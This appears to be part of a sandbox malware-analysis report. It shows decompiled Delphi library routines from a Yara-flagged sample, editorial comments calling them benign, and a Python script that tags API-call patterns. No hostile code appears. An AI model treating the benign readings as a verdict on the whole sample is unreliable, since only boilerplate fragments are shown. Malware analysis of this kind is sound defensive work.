                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeString
                                                    • String ID: <~G$H
                                                    • API String ID: 3341692771-3576284788
                                                    • Opcode ID: 22663e01971d2a1c8f067ade5d69fd3c52a2dadb3113bc62c40a76bf787e1113
                                                    • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                    • Opcode Fuzzy Hash: 22663e01971d2a1c8f067ade5d69fd3c52a2dadb3113bc62c40a76bf787e1113
                                                    • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                      • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                      • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                      • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,03030000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                    • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                    • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                    • String ID: 7
                                                    • API String ID: 2227675388-1331172448
                                                    • Opcode ID: 9a78f7d3737335b21edd66d81c52318f9676be8a12604ca817311499b46f933e
                                                    • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                    • Opcode Fuzzy Hash: 9a78f7d3737335b21edd66d81c52318f9676be8a12604ca817311499b46f933e
                                                    • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 80%
                                                    			E00424E24(void* __eax, void* __ebx, void* __ecx) {
                                                    				signed int _v8;
                                                    				struct tagLOGFONTA _v68;
                                                    				char _v72;
                                                    				char _v76;
                                                    				char _v80;
                                                    				intOrPtr _t76;
                                                    				intOrPtr _t81;
                                                    				void* _t100;
                                                    				void* _t107;
                                                    				void* _t116;
                                                    				intOrPtr _t126;
                                                    				void* _t137;
                                                    				void* _t138;
                                                    				intOrPtr _t139;
                                                    
                                                    				_t137 = _t138;
                                                    				_t139 = _t138 + 0xffffffb4;
                                                    				_v80 = 0;
                                                    				_v76 = 0;
                                                    				_v72 = 0;
                                                    				_t116 = __eax;
                                                    				_push(_t137);
                                                    				_push(0x424fad);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t139;
                                                    				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                    				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                    					__eflags = 0;
                                                    					 *[fs:eax] = 0;
                                                    					_push(0x424fb4);
                                                    					return E004049E4( &_v80, 3);
                                                    				} else {
                                                    					_t76 =  *0x49e8e0; // 0x3030a30
                                                    					E00424168(_t76);
                                                    					_push(_t137);
                                                    					_push(0x424f85);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t139;
                                                    					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                    						_v68.lfHeight =  *(_v8 + 0x14);
                                                    						_v68.lfWidth = 0;
                                                    						_v68.lfEscapement = 0;
                                                    						_v68.lfOrientation = 0;
                                                    						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                    							_v68.lfWeight = 0x190;
                                                    						} else {
                                                    							_v68.lfWeight = 0x2bc;
                                                    						}
                                                    						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                    						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                    						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                    						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                    						E00404C24( &_v72, _v8 + 0x1b,  *(_v8 + 0x19) & 0x00000008);
                                                    						_t100 = E00408F88(_v72, "Default");
                                                    						_t146 = _t100;
                                                    						if(_t100 != 0) {
                                                    							__eflags = _v8 + 0x1b;
                                                    							E00404C24( &_v80, _v8 + 0x1b, _v8 + 0x1b);
                                                    							E0040A020( &(_v68.lfFaceName), _v80);
                                                    						} else {
                                                    							E00404C24( &_v76, "\rMS Sans Serif", _t146);
                                                    							E0040A020( &(_v68.lfFaceName), _v76);
                                                    						}
                                                    						_v68.lfQuality = 0;
                                                    						_v68.lfOutPrecision = 0;
                                                    						_v68.lfClipPrecision = 0;
                                                    						// Map the VCL TFontPitch (fpDefault = 0, fpVariable = 1, fpFixed = 2) onto the GDI
                                                    						// pitch flags DEFAULT_PITCH = 0, FIXED_PITCH = 1, VARIABLE_PITCH = 2.
                                                    						_t107 = E00425108(_t116) - 1;
                                                    						if(_t107 == 0) {
                                                    							_v68.lfPitchAndFamily = 2; // fpVariable -> VARIABLE_PITCH
                                                    						} else {
                                                    							if(_t107 == 1) {
                                                    								_v68.lfPitchAndFamily = 1; // fpFixed -> FIXED_PITCH
                                                    							} else {
                                                    								_v68.lfPitchAndFamily = 0; // fpDefault -> DEFAULT_PITCH
                                                    							}
                                                    						}
                                                    						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                    					}
                                                    					_pop(_t126);
                                                    					 *[fs:eax] = _t126;
                                                    					_push(0x424f8c);
                                                    					_t81 =  *0x49e8e0; // 0x3030a30
                                                    					return E00424174(_t81);
                                                    				}
                                                    			}

                                                    Line addresses (the per-line address column of the listing above; the column alignment was lost in extraction, the listing spans 0x00424e25 to 0x00424fac): 0x00424e25, 0x00424e27, 0x00424e2d, 0x00424e30, 0x00424e33, 0x00424e36, 0x00424e3a, 0x00424e3b, 0x00424e40, 0x00424e43, 0x00424e49, 0x00424e53, 0x00424f92, 0x00424f97, 0x00424f9a, 0x00424fac, 0x00424e59, 0x00424e59, 0x00424e5e, 0x00424e65, 0x00424e66, 0x00424e6b, 0x00424e6e, 0x00424e78, 0x00424e84, 0x00424e89, 0x00424e8e, 0x00424e93, 0x00424e9d, 0x00424ea8, 0x00424e9f, 0x00424e9f, 0x00424e9f, 0x00424eb9, 0x00424ec6, 0x00424ed3, 0x00424edc, 0x00424ee8, 0x00424ef5, 0x00424efa, 0x00424efc, 0x00424f1e, 0x00424f21, 0x00424f2c, 0x00424efe, 0x00424f06, 0x00424f11, 0x00424f11, 0x00424f31, 0x00424f35, 0x00424f39, 0x00424f44, 0x00424f46, 0x00424f4e, 0x00424f48, 0x00424f4a, 0x00424f54, 0x00424f4c, 0x00424f5a, 0x00424f5a, 0x00424f4a, 0x00424f6a, 0x00424f6a, 0x00424f6f, 0x00424f72, 0x00424f75, 0x00424f7a, 0x00424f84, 0x00424f84

                                                    APIs
                                                      • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                    • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCriticalEnterFontIndirectSection
                                                    • String ID: MS Sans Serif$Default
                                                    • API String ID: 2931345757-2137701257
                                                    • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                    • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                    • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                    				char _v8;
                                                    				struct _MEMORY_BASIC_INFORMATION _v36;
                                                    				char _v297;
                                                    				char _v304;
                                                    				intOrPtr _v308;
                                                    				char _v312;
                                                    				char _v316;
                                                    				char _v320;
                                                    				intOrPtr _v324;
                                                    				char _v328;
                                                    				void* _v332;
                                                    				char _v336;
                                                    				char _v340;
                                                    				char _v344;
                                                    				char _v348;
                                                    				intOrPtr _v352;
                                                    				char _v356;
                                                    				char _v360;
                                                    				char _v364;
                                                    				void* _v368;
                                                    				char _v372;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t89;
                                                    				intOrPtr _t101;
                                                    				void* _t108;
                                                    				intOrPtr _t110;
                                                    				void* _t113;
                                                    
                                                    				_t108 = __edi;
                                                    				_v372 = 0;
                                                    				_v336 = 0;
                                                    				_v344 = 0;
                                                    				_v340 = 0;
                                                    				_v8 = 0;
                                                    				_push(_t113);
                                                    				_push(0x40d75b);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t113 + 0xfffffe90;
                                                    				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                    					_t52 =  *0x49dbd4; // 0x407ddc
                                                    					E00406A70(_t52,  &_v8);
                                                    				} else {
                                                    					_t86 =  *0x49de48; // 0x407dd4
                                                    					E00406A70(_t86,  &_v8);
                                                    				}
                                                    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                    				// Resolve the faulting address (+0xc) to its owning module: VirtualQuery with
                                                    				// sizeof(MEMORY_BASIC_INFORMATION) = 0x1c on x86, then GetModuleFileNameA on the
                                                    				// AllocationBase (0x105 = MAX_PATH + 1). State != 0x1000 (MEM_COMMIT) or a failed
                                                    				// lookup means the address is not inside a loaded image, so the message is built
                                                    				// without a module name (two Format arguments instead of three). This reads as the
                                                    				// runtime's own exception-message formatter (resource string via LoadStringA, then
                                                    				// E0040D180 with the address, module and text); the VirtualQuery/GetModuleFileNameA
                                                    				// pair here only names the module and is not an analysis-environment check by itself.
                                                    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                                    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                    					_v368 =  *(_t89 + 0xc);
                                                    					_v364 = 5;
                                                    					_v360 = _v8;
                                                    					_v356 = 0xb;
                                                    					_v352 = _t110;
                                                    					_v348 = 5;
                                                    					_t60 =  *0x49dbfc; // 0x407d7c
                                                    					E00406A70(_t60,  &_v372);
                                                    					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                    				} else {
                                                    					_v332 =  *(_t89 + 0xc);
                                                    					_v328 = 5;
                                                    					E00404C30( &_v340, 0x105,  &_v297);
                                                    					L00409E18(_v340,  &_v336);
                                                    					_v324 = _v336;
                                                    					_v320 = 0xb;
                                                    					_v316 = _v8;
                                                    					_v312 = 0xb;
                                                    					_v308 = _t110;
                                                    					_v304 = 5;
                                                    					_t82 =  *0x49dcbc; // 0x407e84
                                                    					E00406A70(_t82,  &_v344);
                                                    					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                    				}
                                                    				_pop(_t101);
                                                    				 *[fs:eax] = _t101;
                                                    				_push(E0040D762);
                                                    				E004049C0( &_v372);
                                                    				E004049E4( &_v344, 3);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    Line addresses (the per-line address column of the listing above; the column alignment was lost in extraction, the listing spans 0x0040d5a0 to 0x0040d75a): 0x0040d5a0, 0x0040d5ad, 0x0040d5b3, 0x0040d5b9, 0x0040d5bf, 0x0040d5c5, 0x0040d5ca, 0x0040d5cb, 0x0040d5d0, 0x0040d5d3, 0x0040d5d9, 0x0040d5e0, 0x0040d5f4, 0x0040d5f9, 0x0040d5e2, 0x0040d5e5, 0x0040d5ea, 0x0040d5ea, 0x0040d5fe, 0x0040d60b, 0x0040d617, 0x0040d6d3, 0x0040d6d9, 0x0040d6e3, 0x0040d6e9, 0x0040d6f0, 0x0040d6f6, 0x0040d70c, 0x0040d711, 0x0040d723, 0x0040d63a, 0x0040d63d, 0x0040d643, 0x0040d65b, 0x0040d66c, 0x0040d677, 0x0040d67d, 0x0040d687, 0x0040d68d, 0x0040d694, 0x0040d69a, 0x0040d6b0, 0x0040d6b5, 0x0040d6c7, 0x0040d6cc, 0x0040d72c, 0x0040d72f, 0x0040d732, 0x0040d73d, 0x0040d74d, 0x0040d75a

                                                    APIs
                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                      • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                    • String ID: |}@
                                                    • API String ID: 902310565-1323765261
                                                    • Opcode ID: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                    • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                    • Opcode Fuzzy Hash: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                    • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 72%
                                                    			E0044E02C(intOrPtr __eax, void* __edx) {
                                                    				char _v8;
                                                    				signed short _v10;
                                                    				intOrPtr _v16;
                                                    				char _v17;
                                                    				char _v24;
                                                    				intOrPtr _t34;
                                                    				intOrPtr _t40;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t48;
                                                    				void* _t51;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t67;
                                                    				void* _t69;
                                                    				void* _t71;
                                                    				intOrPtr _t72;
                                                    
                                                    				_t69 = _t71;
                                                    				_t72 = _t71 + 0xffffffec;
                                                    				_t51 = __edx;
                                                    				_v16 = __eax;
                                                    				_v10 =  *((intOrPtr*)(__edx + 4));
                                                    				if(_v10 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					// Build a VCL-style TShortCut from the key message: 0x10 = VK_SHIFT, 0x11 = VK_CONTROL,
                                                    					// scShift = 0x2000, scCtrl = 0x4000, scAlt = 0x8000. GetKeyState only samples the
                                                    					// modifier state for this one keystroke (accelerator matching); it is not a key hook.
                                                    					if(GetKeyState(0x10) < 0) {
                                                    						_v10 = _v10 + 0x2000;
                                                    					}
                                                    					if(GetKeyState(0x11) < 0) {
                                                    						_v10 = _v10 + 0x4000;
                                                    					}
                                                    					// Bit 0x20 of byte 0xb of the message is bit 29 of KeyData (the Alt/context-code flag).
                                                    					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                    						_v10 = _v10 + 0x8000;
                                                    					}
                                                    					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                    					_t34 =  *0x49ebac; // 0x3030da8
                                                    					E0042C30C(_t34,  &_v24);
                                                    					_push(_t69);
                                                    					_push(0x44e12a);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t72;
                                                    					while(1) {
                                                    						_v17 = 0;
                                                    						_v8 = L0044DD30(_v16, 2, _v10 & 0x0000ffff);
                                                    						if(_v8 != 0) {
                                                    							break;
                                                    						}
                                                    						if(_v24 == 0 || _v17 != 2) {
                                                    							_pop(_t64);
                                                    							 *[fs:eax] = _t64;
                                                    							_push(0x44e131);
                                                    							_t40 =  *0x49ebac; // 0x3030da8
                                                    							return E0042C304(_t40);
                                                    						} else {
                                                    							continue;
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    					_t42 =  *0x49ebac; // 0x3030da8
                                                    					E0042C30C(_t42,  &_v8);
                                                    					_push(_t69);
                                                    					_push(0x44e0ff);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t72;
                                                    					_v17 = L0044DED8( &_v8, 0, _t69);
                                                    					_pop(_t67);
                                                    					 *[fs:eax] = _t67;
                                                    					_push(0x44e106);
                                                    					_t48 =  *0x49ebac; // 0x3030da8
                                                    					return E0042C304(_t48);
                                                    				}
                                                    				L14:
                                                    			}

                                                    Line addresses (the per-line address column of the listing above; the column alignment was lost in extraction, the listing spans 0x0044e02d to 0x0044e147, with 0x00000000 for lines that have no own instruction): 0x0044e02d, 0x0044e02f, 0x0044e033, 0x0044e035, 0x0044e03f, 0x0044e048, 0x0044e147, 0x0044e04e, 0x0044e058, 0x0044e05a, 0x0044e05a, 0x0044e06a, 0x0044e06c, 0x0044e06c, 0x0044e076, 0x0044e078, 0x0044e078, 0x0044e084, 0x0044e08a, 0x0044e08f, 0x0044e096, 0x0044e097, 0x0044e09c, 0x0044e09f, 0x0044e0a2, 0x0044e0a2, 0x0044e0b4, 0x0044e0bb, 0x00000000, 0x00000000, 0x0044e10a, 0x0044e114, 0x0044e117, 0x0044e11a, 0x0044e11f, 0x0044e129, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0044e10a, 0x0044e0c0, 0x0044e0c5, 0x0044e0cc, 0x0044e0cd, 0x0044e0d2, 0x0044e0d5, 0x0044e0e4, 0x0044e0e9, 0x0044e0ec, 0x0044e0ef, 0x0044e0f4, 0x0044e0fe, 0x0044e0fe, 0x00000000

                                                    APIs
                                                    • GetKeyState.USER32(00000010), ref: 0044E050
                                                    • GetKeyState.USER32(00000011), ref: 0044E062
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID:
                                                    • API String ID: 1649606143-3916222277
                                                    • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                    • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                    • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
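Reviewing a decompilation of this size means separating library boilerplate (the font, exception-message and shortcut routines above) from the sample's own logic. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the report's "APIs" lines for E0040D5A0 and E0044E02C into call records and tags the Delphi RTL/VCL idioms they match. The line format is inferred from the lines shown above; the idiom names, and the rule that VirtualQuery plus GetModuleFileNameA in one function is the exception formatter, are this editor's assumptions rather than anything the sandbox emits.

```python
"""Triage helper for a Joe Sandbox decompilation report: parse the 'APIs' reference lines
of one function into structured call records and tag call patterns that correspond to
ordinary Delphi RTL/VCL code, so they are not counted as malicious behaviour on their own.

Added example written for this page; it is not part of the Joe Sandbox report or plugin.
The line format is inferred from the report text above; the idiom table is this editor's
reading of the decompiled routines, not sandbox output.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One line of the report's 'APIs' section, e.g.
#   • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
#   • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8}))?\s*$"
)


@dataclass(frozen=True)
class ApiRef:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: Optional[str]          # call-site address, when the report gives one
    subcall_of: Optional[str]   # callee address when the API is reached through a subcall


def parse_api_block(text: str) -> List[ApiRef]:
    """Return the API references found in one function's 'APIs' block."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        refs.append(ApiRef(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return refs


def classify(refs: List[ApiRef]) -> Set[str]:
    """Tag known benign Delphi idioms visible in the direct (non-subcall) API calls."""
    direct = {r.api for r in refs if r.subcall_of is None}
    tags = set()
    # Exception-message formatting: map a faulting address to its module (assumption).
    if {"VirtualQuery", "GetModuleFileNameA"} <= direct:
        tags.add("rtl_exception_message")
    # TShortCut matching: modifier state for VK_SHIFT (0x10) and VK_CONTROL (0x11).
    keys = {a for r in refs if r.api == "GetKeyState" and r.subcall_of is None for a in r.args}
    if {"00000010", "00000011"} <= keys:
        tags.add("vcl_shortcut_match")
    # TFont handle creation from a LOGFONT.
    if "CreateFontIndirectA" in direct:
        tags.add("vcl_font_handle")
    # WinHelp macro invocation (HELP_COMMAND).
    if "WinHelpA" in direct:
        tags.add("vcl_help_jump")
    return tags


# Input copied from the report blocks above (not constructed).
EXCEPTION_BLOCK = """\
• VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
• GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
  • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
"""
SHORTCUT_BLOCK = """\
• GetKeyState.USER32(00000010), ref: 0044E050
• GetKeyState.USER32(00000011), ref: 0044E062
"""

if __name__ == "__main__":
    for name, block in (("E0040D5A0", EXCEPTION_BLOCK), ("E0044E02C", SHORTCUT_BLOCK)):
        refs = parse_api_block(block)
        print(name, [f"{r.api}@{r.ref}" for r in refs], sorted(classify(refs)))
```

A tag only says that a function's direct API calls look like library code; it says nothing about the rest of the module, and a function without a tag is not thereby suspicious. Subcall entries are kept in the records but excluded from idiom matching, because a shared helper such as the LoadStringA wrapper appears under many unrelated callers.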

                                                    C-Code - Quality: 76%
                                                    			E004354E8(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				char _v28;
                                                    				char _v32;
                                                    				void* _t33;
                                                    				long _t46;
                                                    				CHAR* _t48;
                                                    				void* _t55;
                                                    				intOrPtr _t67;
                                                    				void* _t74;
                                                    				char _t76;
                                                    				void* _t79;
                                                    
                                                    				_t74 = __edi;
                                                    				_t78 = _t79;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_v32 = 0;
                                                    				_v8 = 0;
                                                    				_v12 = 0;
                                                    				_t76 = __edx;
                                                    				_t55 = __eax;
                                                    				_push(_t79);
                                                    				_push(0x4355e0);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t79 + 0xffffffe4;
                                                    				_t81 = __edx;
                                                    				if(__edx == 0) {
                                                    					E0040D200(0x435088, 1);
                                                    					E00404378();
                                                    				}
                                                    				_v28 = _t76;
                                                    				_v24 = 0xb;
                                                    				E00435234(_t55, _t55,  &_v32, 0, _t74, _t76);
                                                    				_v20 = _v32;
                                                    				_v16 = 0xb;
                                                    				E0040A664("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
                                                    				_t33 = L00435B78(_t55, _t74, _t78, _t81);
                                                    				_t82 = _t33;
                                                    				if(_t33 != 0) {
                                                    					E00435234(_t55, _t55,  &_v12, 0, _t74, _t76);
                                                    					if(L00435AD0(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
                                                    						 *((char*)(_t55 + 0x10)) = 1;
                                                    						E00404A14(_t55 + 0x14, _v8);
                                                    						_t46 = E00404E80(_v8);
                                                    						_t48 = E00404E80(_v12);
                                                    						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
                                                    					}
                                                    				}
                                                    				_pop(_t67);
                                                    				 *[fs:eax] = _t67;
                                                    				_push(0x4355e7);
                                                    				E004049C0( &_v32);
                                                    				return E004049E4( &_v12, 2);
                                                    			}

                                                    APIs
                                                    Strings
                                                    • hI, xrefs: 00435511
                                                    • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00435550
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Help
                                                    • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$hI
                                                    • API String ID: 2830496658-455175267
                                                    • Opcode ID: 528680d23dcfaebcb708a0af9dd70d4af1887779c325f2a6ac742da8a25f82eb
                                                    • Instruction ID: ee1a8833f3819ee9826a6e87181a8fb7dc7e8b52fcd89467c6c2dda304d0cd71
                                                    • Opcode Fuzzy Hash: 528680d23dcfaebcb708a0af9dd70d4af1887779c325f2a6ac742da8a25f82eb
                                                    • Instruction Fuzzy Hash: BC3166B0A006049BDB04EFA5D885A9FB7B5AF4C304F51547EF900A7392D778AE05CB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				char _v9;
                                                    				char _v16;
                                                    				char _v20;
                                                    				intOrPtr _t36;
                                                    				long _t41;
                                                    				intOrPtr _t52;
                                                    				intOrPtr _t66;
                                                    				intOrPtr* _t67;
                                                    				intOrPtr _t68;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				intOrPtr _t76;
                                                    
                                                    				_t72 = __esi;
                                                    				_t71 = __edi;
                                                    				_t74 = _t75;
                                                    				_t76 = _t75 + 0xfffffff0;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v16 = 0;
                                                    				_v20 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t74);
                                                    				_push(0x45af60);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				_t56 = E0045ADD8(_v8);
                                                    				if( *((char*)(_v8 + 0x88)) != 0) {
                                                    					_t52 = _v8;
                                                    					_t79 =  *((intOrPtr*)(_t52 + 0x48));
                                                    					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
                                                    						E0045B3A8(_v8);
                                                    					}
                                                    				}
                                                    				E00458DF8(_t56,  &_v20);
                                                    				E004380E0(_v20, 0,  &_v16, _t79);
                                                    				_t36 =  *0x49ebb8; // 0x0
                                                    				E0045B010(_t36, _v16, _t79);
                                                    				_v9 = 1;
                                                    				_push(_t74);
                                                    				_push(0x45af07);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t76;
                                                    				if( *((short*)(_v8 + 0x102)) != 0) {
                                                    					_t56 = _v8;
                                                    					 *((intOrPtr*)(_v8 + 0x100))();
                                                    				}
                                                    				if(_v9 != 0) {
                                                    					E0045AD74();
                                                    				}
                                                    				_pop(_t66);
                                                    				 *[fs:eax] = _t66;
                                                    				_t41 = GetCurrentThreadId();
                                                    				_t67 =  *0x49de40; // 0x49e034
                                                    				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
                                                    					_v9 = 0;
                                                    				}
                                                    				if(_v9 != 0) {
                                                    					WaitMessage();
                                                    				}
                                                    				_pop(_t68);
                                                    				 *[fs:eax] = _t68;
                                                    				_push(E0045AF67);
                                                    				return E004049E4( &_v20, 2);
                                                    			}

                                                    APIs
                                                      • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
